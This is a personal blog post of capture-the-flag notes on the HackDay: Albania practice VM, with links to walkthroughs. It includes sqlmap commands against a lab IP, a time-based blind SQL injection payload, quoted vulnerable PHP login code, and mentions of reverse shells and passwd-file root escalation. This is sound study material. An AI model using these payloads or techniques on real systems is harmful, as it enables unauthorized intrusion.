Skip to main content

39 VM : HackDay: Albania

https://www.vulnhub.com/entry/hackday-albania,167/


Walkthru:

A. https://github.com/DavidBrosnan/Walkthroughs/wiki/Hackday-Albania [directory hopping using wfuzz, sql injection, sqlmap, file type restriction upload php reverse shell as jpg, msfvenom,meterpreter, no python 2.7 or gcc, password in config.php, mysql> prompt, outfile from mysql, writetable passwd file, adding a root user/pwd to passwd file]

B. http://security-geek.in/2017/02/08/vulnhub-hack-a-day-albania/ []

C. https://g0blin.co.uk/albania-vulnhub-writeup/ [dirsearch, sqlmap time based blind attack, why username field is susceptible to attack while password field isnt ,port forward in our meterpreter session]

Notes:


xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Walkthru C..I note in Sqlmap that we were redirected to index.php when triggering the payload. Let's try entering the generated payload of username=test' RLIKE SLEEP(5)-- smYE as our username, and see why we're being redirected to index.php. Tried to login with it , and I was in

root@kali:~# sqlmap -u 192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/login.php --data "username=test*&password=ing" --threads 10 --random-agent --risk 3 --level 5


root@kali:~# sqlmap -u 192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/login.php --data "username=test*&password=ing" --threads 10 --random-agent --risk 3 --level 5 --technique T
T=time based blind attack 

Ok - obviously the login function must be defined in config.php, so let's see what we've got. I cat out the contents of config.php, and find the check_login function.
function check_login($username,$password){



    $username = str_ireplace("OR", "", $username);
    $username = str_ireplace("UNION", "", $username);
    $username = str_ireplace("AND", "", $username);
    $password = str_ireplace("'","",$password);
    $sql_query = "SELECT ID FROM klienti where `username` = '$username' and `password` = '$password';";
    $result = mysqli_fetch_assoc(execute_query($sql_query));
    $result = $result["ID"];
    if($result >= 1){
        return $result;
    }else{
        return -1;
        }


}
Ok - so we were unable to retrieve any data, because a number of key commands are stripped out. The reason that the username field is the only vulnerable parameter is because the ' character is stripped from the password field.

Comments

Post a Comment

Popular posts from this blog

28 VM SecOS-1

Walkthru: Notes: A. https://c0d3g33k.blogspot.com/2017/01/secos.html [capture admin cookie using 127.0.0.1 in a code  test.html  with cross site scripting vulnerability,  CSRF attack, use exploit 37088 for priv escalation ] B. http://oldsmokingjoe.blogspot.com/2016/01/walkthrough-secos-1.html [ Hacking Node.js and MangoDB   ] c. http://oldsmokingjoe.blogspot.com/2016/01/walkthrough-secos-1.html [use wget to post data from CLI. Add other cmds to ping cmd using curl and wget] D. https://chousensha.github.io/blog/2015/02/04/pentest-lab-secos/ [SSH tunnel so we can access the ping site from Kali and dont have to pass via CLI] Notes: # Nmap 7.70 scan initiated Thu Jul 19 09:26:05 2018 as: nmap -sV -O -oN ../reports/192.168.117.6/192.168.117.6.nmap 192.168.117.6 Nmap scan report for 192.168.117.6 Host is up (0.00042s latency). Not shown: 998 closed ports PORT     STATE SERVICE VERSION 22/tcp   open  ssh  ...
1 comment
Read more

VM 9 : PHP Include And Post Exploitation

Walkthrough 1.        https://medium.com/@Kan1shka9/pentesterlab-php-include-and-post-exploitation-walkthrough-8a85bcfa7b1d 2.        Ine [] 3.        http://megwhite.com.au/pentester-lab-bootcamp-walkthrough-php-include-post-exploitation/ 4.        http://fallensnow-jack.blogspot.com/2014/07/pentester-lab-php-lfi-post-exploitation.html Notes: root@kali:~# nmap 10.0.0.12 Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-30 12:23 EDT Nmap scan report for 10.0.0.12 Host is up (0.00035s latency). Not shown: 999 filtered ports PORT    STATE SERVICE 80/tcp open   http MAC Address: 08:00:27:1F:12:24 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds root@kali:~# Enumerating port 80 Run dirb root@kali:~# dirb http://10.0.0.12/ ----------------- DIRB v2.22 By The Dark Raver...
1 comment
Read more

VM 15: Kioptix 2014

Walkthru Notes 2nd approach  using nc via web using php reverse shell 3rd approach   w/o metasploit =================== walkthru: 1.  Updating OpenFuck Exploit(764) but it didnt work here @ https://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/ 2. ============== Notes: 80/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) MAC Address: 08:00:27:82:89:F9 (Oracle VirtualBox virtual NIC) Running: FreeBSD 9.X|10.X OS CPE: cpe:/o:freebsd:freebsd:9 cpe:/o:freebsd:freebsd:10 OS details: FreeBSD 9.0-RELEASE - 10.3-RELEASE PORT     STATE SERVICE VERSION 8080/tcp open  http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) |_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 |_http-title: 403 Forbidden MAC Address: 08:00:27:82:89:F9 (Oracle VirtualBox...
Post a Comment
Read more